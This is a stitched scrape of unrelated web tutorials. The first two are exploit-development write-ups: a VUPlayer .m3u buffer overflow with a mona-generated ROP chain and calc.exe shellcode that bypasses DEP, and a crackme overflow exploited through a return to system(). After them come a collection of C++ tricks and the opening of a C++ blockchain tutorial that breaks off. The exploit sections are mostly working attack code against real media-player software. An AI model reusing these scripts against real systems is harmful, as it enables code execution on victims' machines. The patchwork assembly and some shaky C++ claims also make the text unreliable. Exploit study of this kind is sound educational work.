    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
 
junk = "A"*1012
 
rop_chain = create_rop_chain()
 
eip = struct.pack('<L',0x10601033) # RETN (BASSMIDI.dll)
 
nops = "\x90"*16
 
shellcode = "\xCC"*200
 
exploit = junk + eip + rop_chain + nops + shellcode
 
fill = "\x43" * (BUF_SIZE - len(exploit))
 
buf = exploit + fill
 
print "[+] Creating .m3u file of size "+ str(len(buf))
 
file = open('vuplayer-dep.m3u','w');
file.write(buf);
file.close();
 
print "[+] Done creating the file"

We added the ROP chain in a function called create_rop_chain() and we have our mock shellcode to verify if the ROP chain did its job. Go ahead and run the script then restart VUPlayer in Immunity Debug. Drag and drop the file to see a glorious INT3 instruction get executed!

post_image

You can also inspect the process memory to see the ROP chain layout:

post_image

Now, sub in an actual payload, I’ll be using a vanilla calc.exe payload. You can view the updated script below:

vuplayer_rop_poc5.py

import struct
 
BUF_SIZE = 3000
 
def create_rop_chain():
 
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x10010157,  # POP EBP # RETN [BASS.dll]
      0x10010157,  # skip 4 bytes [BASS.dll]
      0x10015f77,  # POP EAX # RETN [BASS.dll]
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x10014db4,  # NEG EAX # RETN [BASS.dll]
      0x10032f72,  # XCHG EAX,EBX # RETN 0x00 [BASS.dll]
      0x10015f82,  # POP EAX # RETN [BASS.dll]
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x10014db4,  # NEG EAX # RETN [BASS.dll]
      0x10038a6d,  # XCHG EAX,EDX # RETN [BASS.dll]
      0x101049ec,  # POP ECX # RETN [BASSWMA.dll]
      0x101082db,  # &Writable location [BASSWMA.dll]
      0x1001621c,  # POP EDI # RETN [BASS.dll]
      0x1001dc05,  # RETN (ROP NOP) [BASS.dll]
      0x10604154,  # POP ESI # RETN [BASSMIDI.dll]
      0x10101c02,  # JMP [EAX] [BASSWMA.dll]
      0x10015fe7,  # POP EAX # RETN [BASS.dll]
      0x1060e25c,  # ptr to &VirtualProtect() [IAT BASSMIDI.dll]
      0x1001d7a5,  # PUSHAD # RETN [BASS.dll]
      0x10022aa7,  # ptr to 'jmp esp' [BASS.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
 
junk = "A"*1012
 
rop_chain = create_rop_chain()
 
eip = struct.pack('<L',0x10601033) # RETN (BASSMIDI.dll)
 
nops = "\x90"*16
 
shellcode = ("\xbb\xc7\x16\xe0\xde\xda\xcc\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x33\x83\xc0\x04\x31\x58\x0e\x03\x9f\x18\x02\x2b\xe3\xcd\x4b"
"\xd4\x1b\x0e\x2c\x5c\xfe\x3f\x7e\x3a\x8b\x12\x4e\x48\xd9\x9e"
"\x25\x1c\xc9\x15\x4b\x89\xfe\x9e\xe6\xef\x31\x1e\xc7\x2f\x9d"
"\xdc\x49\xcc\xdf\x30\xaa\xed\x10\x45\xab\x2a\x4c\xa6\xf9\xe3"
"\x1b\x15\xee\x80\x59\xa6\x0f\x47\xd6\x96\x77\xe2\x28\x62\xc2"
"\xed\x78\xdb\x59\xa5\x60\x57\x05\x16\x91\xb4\x55\x6a\xd8\xb1"
"\xae\x18\xdb\x13\xff\xe1\xea\x5b\xac\xdf\xc3\x51\xac\x18\xe3"
"\x89\xdb\x52\x10\x37\xdc\xa0\x6b\xe3\x69\x35\xcb\x60\xc9\x9d"
"\xea\xa5\x8c\x56\xe0\x02\xda\x31\xe4\x95\x0f\x4a\x10\x1d\xae"
"\x9d\x91\x65\x95\x39\xfa\x3e\xb4\x18\xa6\x91\xc9\x7b\x0e\x4d"
"\x6c\xf7\xbc\x9a\x16\x5a\xaa\x5d\x9a\xe0\x93\x5e\xa4\xea\xb3"
"\x36\x95\x61\x5c\x40\x2a\xa0\x19\xbe\x60\xe9\x0b\x57\x2d\x7b"
"\x0e\x3a\xce\x51\x4c\x43\x4d\x50\x2c\xb0\x4d\x11\x29\xfc\xc9"
"\xc9\x43\x6d\xbc\xed\xf0\x8e\x95\x8d\x97\x1c\x75\x7c\x32\xa5"
"\x1c\x80")
 
exploit = junk + eip + rop_chain + nops + shellcode
 
fill = "\x43" * (BUF_SIZE - len(exploit))
 
buf = exploit + fill
 
print "[+] Creating .m3u file of size "+ str(len(buf))
 
file = open('vuplayer-dep.m3u','w');
file.write(buf);
file.close();
 
print "[+] Done creating the file"

Run the final exploit script to generate the m3u file, restart VUPlayer in Immunity Debug and voila! We have a calc.exe!

post_image

Also, if you are lucky then Mona will auto-generate a complete ROP chain for you in the rop_chains.txt file from the !mona rop command (which is what I used). But, it’s important to understand how these chains are built line by line before you go automating everything!

post_image

Resources, Final Thoughts and Feedback

Congrats on building your first ROP chain! It’s pretty tricky to get your head around at first, but all it takes is a little time to digest, some solid assembly programming knowledge and a bit of familiarity with the Windows OS. When you get the essentials under your belt, these more advanced exploit techniques become easier to handle. If you found anything to be unclear or you have some recommendations then send me a message on Twitter (@shogun_lab). I also encourage you to take a look at some additional tutorials on ROP and the developer docs for the various Windows OS memory protection functions. See you next time in Part 6!

Bypass Data Execution Protection (DEP)

Hey folks! This topic details how to overflow a buffer, bypass DEP (Data Execution Prevention) and take control of the executable.

Recommended Prerequisites

  • C/C++ language, a basic level would be fine
  • x86 Intel Assembly
  • Familiarity with Buffer Overflow
  • Debuggers/Disassembly

The binary

File 40
Virustotal 22

Okay, first thing we need to do is see what the executable brings us, so we run it.

r_opt

Here we see that it asks for a file, fichero.dat, but as the file does not exist it tells us that it cannot be opened. Once the file is created, it shows a message with 3 values at 0 that seem to correspond to 3 variables (cookie, cookie2 and size) and nothing else.

Since we don’t know what it does, let’s take a look at it.

This function has 5 variables, 4 of which are initialized to 0 and one to 32h (“2”). A pointer to LoadLibrary is stored at 0x10103024, then it calls fopen on the “fichero.dat” file in binary read mode, stores the FILE pointer at 0x10103020 and finally checks whether the file exists: if it does not, it goes to 0x101010d3 and closes (as we saw before); if it does, it goes to 0x101010e9, so let’s look there.

function2_opt(1)

Ok, in this procedure it first reads 4 bytes of fichero.dat with fread and stores them through a pointer at [ebp-c]; fread returns the total number of elements read and that is stored at [ebp-8]. It then does another 4-byte fread into a pointer at [ebp-10], and one more of a single byte into [ebp-1]. Finally it compares that byte with [ebp-14], which is 32h (“2”): if it is less than or equal (jle) it goes to 0x10101155, otherwise it shows a message saying “Nos fuimos al carajo” (roughly, “we’re screwed”) and closes.

Then we write 8 bytes plus the correct byte (“2”) into the file so that we reach 0x10101155, for example:

1234 + 5678 + 2

function3_opt

Well, here it pushes the bytes saved by fread and prints them, allocates 50 bytes (32h) of memory with malloc, stores the pointer to the allocated memory at [ebp-1c], then pushes the first 8 bytes of “fichero.dat” and calls 0x10101010, so let’s look over there.

function4_opt

Okay, what it does here is take the first 4 bytes of fichero.dat and add them to the following 4 bytes; the result is compared to 58552433h and, if the condition holds, it loads “pepe.dll”. So let’s make sure the condition is met (as it is little endian we have to put the bytes in backwards).

Since not every character pair meets the condition (for example “0” (30h) + “(” (28h) = 58h only gets one byte right), we write a script that builds the file for us:

data = "\x21\x1210" + "\x12\x12$(" + "2"
with open("fichero.dat", "w") as file:
	file.write(data)

Okay, this must meet the condition, let’s see.

check58_opt

Well, let’s see what’s it now.

buffer_opt

Once we leave 0x10101010 we see that it reads [ebp-1] bytes of fichero.dat with fread and stores them in a buffer at [ebp-54]. Okay, here’s a buffer overflow, let’s analyze it.

First we saw that the ninth byte of “fichero.dat” was stored in [ebp-1], then compared to [ebp-14] (“2”).

anal1_opt(1)

Well, now we see that this byte ([ebp-1]) is used as the size for fread, which will store that number of bytes in a buffer at [ebp-54]. Since the nearest variable is ebp-20, the buffer is [ebp-54] - [ebp-20] = 34h (52) bytes; we can also see this in the IDA stack view (right click -> array -> ok).

buffer_opt(1)

idastack_opt(1)

Okay, knowing all that, how could we overflow the buffer?

[ebp-1] is the ninth byte of fichero.dat; it is used as the fread size for storing into the buffer at [ebp-54], and it must also be less than or equal to 32h (“2”).

The comparison is signed (jle), so a byte with the high bit set (a negative number) passes the check, while fread treats the same byte as a large unsigned size; this lets us write more bytes than the 52 the buffer holds.

0x10101139 movsx ecx,  byte ptr ss:[ebp-1]
0x1010113d cmp ecx,    dword ptr ss:[ebp-14]
0x10101140 jle         stack9b.10101155

Let’s try to get to the edge of the buffer, which at the same time exceeds the size the check was supposed to allow (50 bytes, 32h) by 2 bytes.

data = "\x21\x1210" + "\x12\x12$(" + "\xff" + "A" * 52

with open("fichero.dat", "w") as file:
	file.write(data)

ff_opt
ffstack_opt

Cool!!! Let’s keep looking and see if we can control the return.

Well, now there is a procedure that copies the buffer bytes at [ebp-54] into the memory block allocated by malloc ([ebp-1c]).

So, if I fill [ebp-1c] with “\x41\x41\x41\x41” it won’t be able to write there, because that’s not a valid address; let’s find one that is.

ywrite_opt

All right, let’s check the stack, see how many bytes it takes to get to the start of retn and control it.

88b_opt

Okay, let’s set up our exploit

import subprocess

shellcode ="\xB8\x40\x50\x03\x78\xC7\x40\x04"+ "calc" + "\x83\xC0\x04\x50\x68\x24\x98\x01\x78\x59\xFF\xD1"

buff = "\x41" * 52
ebp_20 = "\x41" * 4
ebp_1c = "\x30\x30\x10\x10"    # Address with write permission
ebp_18 = "\x41" * 4
ebp_14 = "\x41" * 4
ebp_10 = "\x41" * 4
ebp_c = "\x41" * 4
ebp_8 = "\x41" * 4
ebp_4 = "\x41" * 4
s = "\x41" * 4    # ebp
r = shellcode


data = "\x21\x1210" + "\x12\x12$(" + "\xff" + buff + ebp_20 + ebp_1c + ebp_18 + ebp_14 + ebp_10 + ebp_c + ebp_8 + ebp_4 + s + r

with open("fichero.dat", "w") as file:
	file.write(data)

subprocess.call(r"stack9b.exe")

Well, we already have EIP under control, but it doesn’t let me execute my shellcode; this is due to DEP (Data Execution Prevention).

Summing up, DEP changes the permissions of the segments where data is stored to prevent us from executing code there -ricnar

So, to bypass DEP we can use ROP (return oriented programming), which basically means using gadgets from the program’s own executable code to change the stack permissions with an API like VirtualProtect or VirtualAlloc.

Looking for gadgets in pepe.dll I couldn’t find VirtualAlloc, but there is a pointer to system(); all that’s missing is a return address, which can be exit(), and a fixed location we control where we can place the string to pass to system().

system_opt(1)
exit_opt

Now only the string for system() is missing; we can use the address with write permission.

calc_opt(1)

Here I had to rearrange the stack layout, because malloc only allocated 50 bytes and otherwise I lost control of EIP; this is how the exploit looks.

import subprocess

system = "\x24\x98\x01\x78"    # system()
calc = "calc.exe"

buff = "\x41" * 42
#ebp_20 = "\x41" * 4
ebp_1c = "\x30\x30\x10\x10"    # Address with write permission
ebp_18 = "\x41" * 4
ebp_14 = "\x41" * 4
ebp_10 = "\x41" * 4
ebp_c = "\x41" * 4
ebp_8 = "\x41" * 4
ebp_4 = "\x41" * 4
s = "\x41" * 4    # ebp
r = system
exit = "\x78\x1d\x10\x10"    # exit()
ptr_calc = "\x5a\x30\x10\x10"



data = "\x21\x1210" + "\x12\x12$(" + "\xff" + buff + calc + "\x41" * 6 +  ebp_1c + ebp_18 + ebp_14 + ebp_10 + ebp_c + ebp_8 + ebp_4 + s + r + exit + ptr_calc

with open("fichero.dat", "w") as file:
	file.write(data)

subprocess.call(r"stack9b.exe")

What are some fun C++ tricks

This one applies to all languages so far:

a=a+b-(b=a);

A REALLY fast way of swapping a and b.

#include <iostream>
#include <string>
#include <cstdlib>   // for exit()

using namespace std;

int main (int argc, char *argv[]) {
float a; cout << "A:"; cin >> a;
float b; cout << "B:" ; cin >> b;

cout << "---------------------" << endl;
cout << "A=" << a << ", B=" << b << endl;
a=a+b-(b=a);
cout << "A=" << a << ", B=" << b << endl;
exit(0);
}


void Send(int * to, const int* from, const int count)

{

   int n = (count+7) / 8;

   switch(count%8)

   {

      case 0:

         do

            {

               *to++ = *from++;

      case 7:

               *to++ = *from++;

      case 6:

               *to++ = *from++;

      case 5:

               *to++ = *from++;

      case 4:

               *to++ = *from++;

      case 3:

               *to++ = *from++;

      case 2:

               *to++ = *from++;

      case 1:

               *to++ = *from++;

              } while (--n>0);

    }

}


Preprocessor Tricks

The arraysize macro used in Chrome’s source:

  1. template <typename T, size_t N>
  2. char (&ArraySizeHelper(T (&array)[N]))[N];
  3. #define arraysize(array) (sizeof(ArraySizeHelper(array)))

This is better than the ordinary sizeof(array)/sizeof(array[0]) because it raises compilation errors when the passed in array is just a pointer, or a null pointer whereas the simpler macro silently returns a useless value. For a detailed example, see PVS-Studio vs Chromium.

Predefined Macros:

  1. #define expect(expr) if(!expr) cerr << "Assertion " << #expr \
  2. " failed at " << __FILE__ << ":" << __LINE__ << endl;
  3. #define stringify(x) #x
  4. #define tostring(x) stringify(x)
  5. #define MAGIC_CONSTANT 314159
  6. cout << "Value of MAGIC_CONSTANT=" << tostring(MAGIC_CONSTANT);

The tostring macro is a common trick used to expand macro values inside other macros. The Linux kernel uses a lot of macro tricks.

Using iterators for quickly dumping the contents of a container:

  1. #define dbg(v) copy(v.begin(), v.end(), ostream_iterator<typeof(*v.begin())>(cout, " "))

Sadly, this doesn’t work for pair types so maps are out of scope.

Template Voodoo

Recursion: You can specialize your class templates for certain cases, so you can write down the base case of a recursion and then define the generic template as a recursive combination of base cases.
For example, the following code calculates the values of the Choose function at compile time:

  1. template<unsigned n, unsigned r>
  2. struct Choose {
  3. enum {value = (n * Choose<n-1, r-1>::value) / r};
  4. };
  5. template<unsigned n>
  6. struct Choose<n, 0> {
  7. enum {value = 1};
  8. };
  9. int main() {
  10. // Prints 56
  11. cout << Choose<8, 3>::value;
  12. // Compile time values can be used as array sizes
  13. int x[Choose<25, 3>::value];
  14. }

More interesting examples at C++ Programming/Templates/Template Meta-Programming

Mostly Painless Memory Management and RAII

With certain restrictions, you can create templates for "smart" pointers that automatically deallocate resources when they go out of scope or their reference count goes to 0. This is basically done by overloading operator * and operator =. Based on your use case, you can transfer ownership when the operator = is used, or update reference counts.
See Smart Pointer Guidelines — The Chromium Projects and http://code.google.com/searchfra…

Argument-dependent name lookup aka Koenig lookup

When a function call cannot be matched to a name in the current namespace, other namespaces can be searched for a matching signature. This is why std::cout << "Hi"; works even though operator << is defined in the std namespace.
See Argument-dependent name lookup


auto keyword
In C++ you can use auto to iterate over map, vector, set, etc.; it specifies that the type of the variable being declared will be automatically deduced from its initializer, and for functions the return type will be deduced from the return statements.
So instead of :

  1. vector<int> vs;
  2. vs.push_back(4),vs.push_back(7),vs.push_back(9),vs.push_back(10);
  3. for (vector<int>::iterator it = vs.begin(); it != vs.end(); ++it)
  4. cout << *it << ' ';cout<<'\n';

just use :

  1. vector<int> vs;
  2. vs.push_back(4),vs.push_back(7),vs.push_back(9),vs.push_back(10);
  3. for (auto it: vs)
  4. cout << it << ' ';cout<<endl;
  5. //you can also change the values using
  6. vector<int> vs;
  7. vs.push_back(4),vs.push_back(7),vs.push_back(9),vs.push_back(10);
  8. for (auto& it: vs) it*=3;
  9. for (auto it: vs)
  10. cout << it << ' ';cout<<endl;

Declaring variable

  1. template<class A, class B>
  2. auto mult(A x, B y) -> decltype(x * y){
  3. return x * y;
  4. }
  5. int main(){
  6. auto a = 3 * 2; //the return type is the type of operator (x*y)
  7. cout<<a<<endl;
  8. return 0;
  9. }

The Power of Strings 

  1. int n,m;
  2. cin >> n >> m;
  3. int matrix[n+1][m+1];
  4. //This loop
  5. for(int i = 1; i <= n; i++) {
  6. for(int j = 1; j <= m; j++)
  7. cout << matrix[i][j] << " ";
  8. cout << "\n";
  9. }
  10. // is equivalent to this
  11. for(int i = 1; i <= n; i++)
  12. for(int j = 1; j <= m; j++)
  13. cout << matrix[i][j] << " \n"[j == m];

because " \n" is a char*," \n"[0] is ' ' and " \n"[1] is '\n'  .

Some Hidden function
__gcd(x, y)
you don’t need to code gcd function.

  1. cout<<__gcd(54,48)<<endl; //return 6

__builtin_ffs(x)
This function returns 1 + the index of the least significant 1-bit of x. If x == 0, it returns 0. Here x is int; the same function with suffix ‘l’ takes a long argument and with suffix ‘ll’ a long long argument.
e.g.: __builtin_ffs(10) = 2, because 10 is ‘...1010’ in base 2 and the first 1-bit from the right is at index 1 (0-based), and the function returns 1 + index.

Pairing tricks 

  1. pair<int, int> p;
  2. //This
  3. p = make_pair(1, 2);
  4. //equivalent to this
  5. p = {1, 2};
  6. //So
  7. pair<int, pair<char, long long> > p;
  8. //now easier
  9. p = {1, {'a', 2ll}};

Super include 
Simply use
#include <bits/stdc++.h>
This library includes many of the libraries we need, like algorithm, iostream, vector and many more. Believe me, you don’t need to include anything else 😀 !!

Smart Pointers

Using smart pointers, we can make pointers work in such a way that we don’t need to explicitly call delete. A smart pointer is a wrapper class over a pointer with operators like * and -> overloaded. The objects of a smart pointer class look like pointers, but can do many things that a normal pointer can’t, like automatic destruction (yes, we don’t have to explicitly use delete), reference counting and more.
The idea is to make a class with a pointer, a destructor and overloaded operators like * and ->. Since the destructor is automatically called when an object goes out of scope, the dynamically allocated memory is automatically deleted (or the reference count can be decremented), as in the sketch below.
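A minimal sketch of that idea (the class name SmartPtr and the example in main are made up for illustration; in real code you would normally just use std::unique_ptr or std::shared_ptr):

#include <iostream>

// Toy smart pointer: owns a raw pointer, overloads * and ->, and frees the
// object in its destructor so no explicit delete is needed.
template <typename T>
class SmartPtr {
    T *_ptr;
public:
    explicit SmartPtr(T *ptr) : _ptr(ptr) {}
    ~SmartPtr() { delete _ptr; }                  // automatic destruction
    T &operator*() { return *_ptr; }
    T *operator->() { return _ptr; }
    SmartPtr(const SmartPtr &) = delete;          // no copying in this sketch; a real one would ref-count
    SmartPtr &operator=(const SmartPtr &) = delete;
};

int main() {
    SmartPtr<int> p(new int(42));
    std::cout << *p << std::endl;                 // the int is freed when p goes out of scope
}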


You can put URIs in your C++ code and the compiler will not throw any error.

  1. #include <iostream>
  2. int main() {
  3. using namespace std;
  4. http://www.google.com
  5. int x = 5;
  6. cout << x;
  7. }

Explanation: Any identifier followed by a : becomes a (goto) label in C++. Anything following // becomes a comment, so in the code above, http is a label and //www.google.com is a comment. The compiler might throw a warning, however, since the label is unused.


Don’t Confuse Assign (=) with Test-for-Equality (==).

This one is elementary, although it might have baffled Sherlock Holmes. The following looks innocent and would compile and run just fine if C++ were more like BASIC:

if (a = b)
cout << "a is equal to b.";

Because this looks so innocent, it creates logic errors requiring hours to track down within a large program unless you’re on the lookout for it. (So when a program requires debugging, this is the first thing I look for.) In C and C++, the following is not a test for equality:

a = b

What this does, of course, is assign the value of b to a and then evaluate to the value assigned.
The problem is that a = b does not generally evaluate to a reasonable true/false condition (with one major exception I’ll mention later). But in C and C++, any numeric value can be used as a condition for “if” or “while”.
Assume that a and b are set to 0. The effect of the previously-shown if statement is to place the value of b into a; then the expression a = b evaluates to 0. The value 0 equates to false. Consequently, a and b are equal, but exactly the wrong thing gets printed:

if (a = b)     // THIS ENSURES a AND b ARE EQUAL...
cout << "a and b are equal.";
else
cout << "a and b are not equal.";  // BUT THIS GETS PRINTED!

The solution, of course, is to use test-for-equality when that’s what you want. Note the use of double equal signs (==). This is correct inside a condition.

// CORRECT VERSION:
if (a == b)
cout << "a and b are equal.";


The most amazing trick I found was in the status of someone’s topcoder profile:
Code:
#include <cstdio>
double m[]= {7709179928849219.0, 771};
int main()
{
m[1]--?m[0]*=2,main():printf((char*)m);
}
You will be seriously amazed by the output…here it is:
C++Sucks

I tried to analyse the code and came up with a reason but not an exact explanation, so I asked about it on Stack Overflow; you can go through the explanation here:
Concept behind this 4 lines tricky C++ code
Read it and you will learn something you wouldn’t have even thought of… 😉


  1. static const unsigned char BitsSetTable256[256] =
  2. {
  3. # define B2(n) n, n+1, n+1, n+2
  4. # define B4(n) B2(n), B2(n+1), B2(n+1), B2(n+2)
  5. # define B6(n) B4(n), B4(n+1), B4(n+1), B4(n+2)
  6. B6(0), B6(1), B6(1), B6(2)
  7. };
  8. unsigned int v; // count the number of bits set in 32-bit value v
  9. unsigned int c; // c is the total bits set in v
  10. // Option 1:
  11. c = BitsSetTable256[v & 0xff] +
  12. BitsSetTable256[(v >> 8) & 0xff] +
  13. BitsSetTable256[(v >> 16) & 0xff] +
  14. BitsSetTable256[v >> 24];
  15. // Option 2:
  16. unsigned char * p = (unsigned char *) &v;
  17. c = BitsSetTable256[p[0]] +
  18. BitsSetTable256[p[1]] +
  19. BitsSetTable256[p[2]] +
  20. BitsSetTable256[p[3]];
  21. // To initially generate the table algorithmically:
  22. BitsSetTable256[0] = 0;
  23. for (int i = 0; i < 256; i++)
  24. {
  25. BitsSetTable256[i] = (i & 1) + BitsSetTable256[i / 2];
  26. }

 

 

  1. float Q_rsqrt( float number )
  2. {
  3. long i;
  4. float x2, y;
  5. const float threehalfs = 1.5F;
  6. x2 = number * 0.5F;
  7. y = number;
  8. i = * ( long * ) &y; // evil floating point bit level hacking
  9. i = 0x5f3759df - ( i >> 1 ); // what the fuck?
  10. y = * ( float * ) &i;
  11. y = y * ( threehalfs - ( x2 * y * y ) ); // 1st iteration
  12. // y = y * ( threehalfs - ( x2 * y * y ) ); // 2nd iteration, this can be removed
  13. return y;
  14. }

Iteration: 

  1. #define FOR(i,n) for(int (i)=0;(i)<(n);(i)++)
  2. #define FORR(i,a,b) for(int (i)=(a);(i)<(b);(i)++)
  3. //reverse
  4. #define REV(i,n) for(int (i)=(n)-1;(i)>=0;(i)--)

Handy way to use it like this. 

  1. typedef long long int int64;
  2. typedef unsigned long long int uint64;

FastIO for +ve integers.

    1. inline void frint(int *a){
    2. register char c=0;while (c<33) c=getchar_unlocked();*a=0;
    3. while (c>33){*a=*a*10+c-'0';c=getchar_unlocked();}
    4. }

Try This….

#include <iostream>
using namespace std;
int main()
{
int a,b,c;
int count = 1;
for (b=c=10;a="- FIGURE?, UMKC,XYZHello Folks,\
TFy!QJu ROo TNn(ROo)SLq SLq ULo+\
UHs UJq TNn*RPn/QPbEWS_JSWQAIJO^\
NBELPeHBFHT}TnALVlBLOFAkHFOuFETp\
HCStHAUFAgcEAelclcn^r^r\\tZvYxXy\
T|S~Pn SPm SOn TNn ULo0ULo#ULo-W\
Hq!WFs XDt!" [b+++21]; )
for(; a-- > 64 ; )
putchar ( ++c=='Z' ? c = c/ 9:33^b&1);
return 0;
}


I think one of the coolest of all time, is defining an abstract base class in C++, and inheriting from it in python, and passing it back to C++ to call.
It actually works

  1. struct Interface{
  2. virtual int foo()const=0;
  3. virtual ~Interface(){}
  4. };
  5. void call(Interface const& f){
  6. std::cout<<f.foo()<<std::endl;
  7. }
  8. struct InterfaceWrap final: Interface, boost::python::wrapper<Interface>
  9. {
  10. int foo() const final
  11. {
  12. return this->get_override("foo")();
  13. }
  14. };
  15. BOOST_PYTHON_MODULE(interface){
  16. using namespace boost::python;
  17. class_<Interface ,boost ::noncopyable,boost::shared_ptr<Interface>>("_InterfaceCpp",no_init)
  18. .def("foo",&Interface::foo)
  19. ;
  20. class_<InterfaceWrap ,bases<Interface>,boost::shared_ptr<InterfaceWrap>>("Interface",init<>())
  21. ;
  22. def("call",&call);
  23. }

and then

  1. import interface as i # C++ code
  2. class impl(i.Interface):#inherit from C++ class
  3. def __init__(self):
  4. i.Interface.__init__(self)
  5. def foo(self):
  6. return 100
  7. i.call(impl())#call C++ function with Python derived class

This does exactly what you think it should do.


void qsort ( void * base, size_t num, size_t size, int ( * compar ) ( const void *, const void * ) )

base Pointer to the first element of the array to be sorted.

num Number of elements in the array pointed by base. size_t is an unsigned integral type.

size Size in bytes of each element in the array. size_t is an unsigned integral type.

compar Function that compares two elements. This function is called repeatedly by qsort to compare two elements. It shall follow this prototype:

int compar ( const void * elem1, const void * elem2 );

It takes two pointers as arguments (both type-cast to const void*). The function should compare the data pointed to by both: if they match in ranking, the function shall return zero; if elem1 goes before elem2, it shall return a negative value; and if it goes after, a positive value.

Eg :

int values[] = { 40, 10, 100, 90, 20, 25 };

int compare (const void * a, const void * b) { return ( *(int*)a - *(int*)b ); }

int main () {
int n;
qsort (values, 6, sizeof(int), compare);
for (n=0; n<6; n++) printf ("%d ",values[n]); return 0; }


Partial template specialization

C++11 has this cool function get<J> which can be used to access the first and second member of a pair, with a different syntax:

  1. std::pair < std::string, double > pr ( "pi", 3.14 );
  2. std::cout << std::get < 0 > ( pr ); // outputs "pi"
  3. std::cout << std::get < 1 > ( pr ); // outputs 3.14

Note that this is a function and not a function object or a member function.

I do not find it trivial to write a function

  • with three template types template < size_t J, class T1, class T2 >
  • which can get std::pair < T1, T2 > as an argument
  • and outputs pr.first if the template value J is 0
  • and outputs pr.second if the template value J is 1.

In particular consider that in C++ one cannot overload a function based on its return type. So what should the return type of this function be declared as? T1 or T2?

  1. template < size_t J, class T1, class T2>
  2. ??? get ( std::pair < T1, T2 > & );

The interesting thing is that one could already write this function in C++98 using Partial template specialization, which is a really cool trick. The problem is that function templates cannot be partially specialized, but this is easy to solve:

  1. namespace
  2. {
  3. /*!
  4. * helper template to do the work with partial specialization
  5. */
  6. template < size_t J, class T1, class T2 >
  7. struct Get;
  8. template < class T1, class T2>
  9. struct Get < 0, T1, T2 >
  10. {
  11. typedef typename std::pair < T1, T2 >::first_type result_type;
  12. static result_type & elm ( std::pair < T1, T2 > & pr ) { return pr.first; }
  13. static const result_type & elm ( const std::pair < T1, T2 > & pr ) { return pr.first; }
  14. };
  15. template < class T1, class T2>
  16. struct Get < 1, T1, T2 >
  17. {
  18. typedef typename std::pair < T1, T2 >::second_type result_type;
  19. static result_type & elm ( std::pair < T1, T2 > & pr ) { return pr.second; }
  20. static const result_type & elm ( const std::pair < T1, T2 > & pr ) { return pr.second; }
  21. };
  22. }
  23. template < size_t J, class T1, class T2 >
  24. typename Get< J, T1, T2 >::result_type & get ( std::pair< T1, T2 > & pr )
  25. {
  26. return Get < J, T1, T2 >::elm( pr );
  27. }
  28. template < size_t J, class T1, class T2 >
  29. const typename Get< J, T1, T2 >::result_type & get ( const std::pair< T1, T2 > & pr )
  30. {
  31. return Get < J, T1, T2 >::elm( pr );
  32. }

Define operator<< for STL structures to make it easy to add debug outputs to your code. (This is better than special printing functions because it nests automatically! Printing a map< vector<int>, int> works without any additional effort if you can print any map and any vector.)

Additionally, define a macro that makes nicer debug outputs and makes it easy to turn them off using the standard mechanism (same one that is used for assert). Here’s a short example how to do all of this in C++11:

  1. #include <iostream>
  2. #include <string>
  3. #include <map>
  4. #ifdef NDEBUG
  5. #define DEBUG(var)
  6. #else
  7. #define DEBUG(var) { std::cout << #var << ": " << (var) << std::endl; }
  8. #endif
  9. template<typename T1, typename T2>
  10. std::ostream& operator<< (std::ostream& out, const std::map<T1,T2> &M) {
  11. out << "{ ";
  12. for (auto item:M) out << item.first << "->" << item.second << ", ";
  13. out << "}";
  14. return out;
  15. }
  16. int main() {
  17. std::map<std::string,int> age = { {"Joe",47}, {"Bob",22}, {"Laura",19} };
  18. DEBUG(age);
  19. }

This is a very amazing piece of code:

main(a){printf(a,34,a="main(a){printf(a,34,a=%c%s%c,34);}",34);}

It is the shortest C++ code which, when executed, prints itself. It was discovered by Vlad Taeerov and Rashit Fakhreyev and is only 64 characters in length (making it the shortest).


To Convert list<T> to vector<T>:

  1. std::vector<T> v(l.begin(), l.end());

 

Variadic Templates :

They can be useful in places. You can pass any number of parameters .
Example  :

  1. #include <iostream>
  2. #include <bitset>
  3. #include <string>
  4. using namespace std;
  5.  
  6. void print() {
  7. cout<<"Nothing to print :)" ;
  8. }
  9.  
  10. template<typename T,typename... args>
  11. void print(T x,args... y) {
  12. cout<<x<<endl;
  13. print(y...);
  14. }
  15.  
  16. int main() {
  17. print(10,14.56,"Quora",bitset<20>(28));
  18. return 0;
  19. }

 

Code on ideone : http://ideone.com/b8TNHD

Output :

  1. 10
  2. 14.56
  3. Quora
  4. 00000000000000011100
  5. Nothing to print 🙂

 

Range based for loops can be used with some STL containers :
eg.

 

  1. #include <iostream>
  2. #include <list>
  3. #include <vector>
  4.  
  5. using namespace std;
  6.  
  7. int main() {
  8. list<int> x;
  9. x.push_back(10);
  10. x.push_back(20);
  11. for(auto i : x)
  12. cout<<i;
  13. return 0;
  14. }

Build a blockchain with C++

So, you might have heard a lot about something called a blockchain lately and wondered what all the fuss is about. A blockchain is a ledger which has been written in such a way that updating the data contained within it becomes very difficult, some say the blockchain is immutable and to all intents and purposes they’re right but immutability suggests permanence and nothing on a hard drive could ever be considered permanent. Anyway, we’ll leave the philosophical debate to the non-techies; you’re looking for someone to show you how to write a blockchain in C++, so that’s exactly what I’m going to do.

Before I go any further, I have a couple of disclaimers:

  1. This tutorial is based on one written by Savjee using NodeJS; and
  2. It’s been a while since I wrote any C++ code, so I might be a little rusty.

The first thing you’ll want to do is open a new C++ project, I’m using CLion from JetBrains but any C++ IDE or even a text editor will do. For the interests of this tutorial we’ll call the project TestChain, so go ahead and create the project and we’ll get started.

If you’re using CLion you’ll see that the main.cpp file will have already been created and opened for you; we’ll leave this to one side for the time being.

Create a file called Block.h in the main project folder, you should be able to do this by right-clicking on the TestChain directory in the Project Tool Window and selecting: New > C/C++ Header File.

Inside the file, add the following code (if you’re using CLion place all code between the lines that read #define TESTCHAIN_BLOCK_H and #endif):
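Something along these lines (a sketch based on the description just below):

#include <cstdint>
#include <iostream>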

These lines above tell the compiler to include the cstdint, and iostream libraries.

Add this line below it:
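Presumably something like:

using namespace std;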

This essentially creates a shortcut to the std namespace, which means that we don’t need to refer to declarations inside the std namespace by their full names e.g. std::string, but can instead use their shortened names e.g. string.

So far, so good; let’s start fleshing things out a little more.

A blockchain is made up of a series of blocks which contain data and each block contains a cryptographic representation of the previous block, which means that it becomes very hard to change the contents of any block without then needing to change every subsequent one; hence where the blockchain essentially gets its immutable properties.

So let’s create our block class, add the following lines to the Block.h header file:
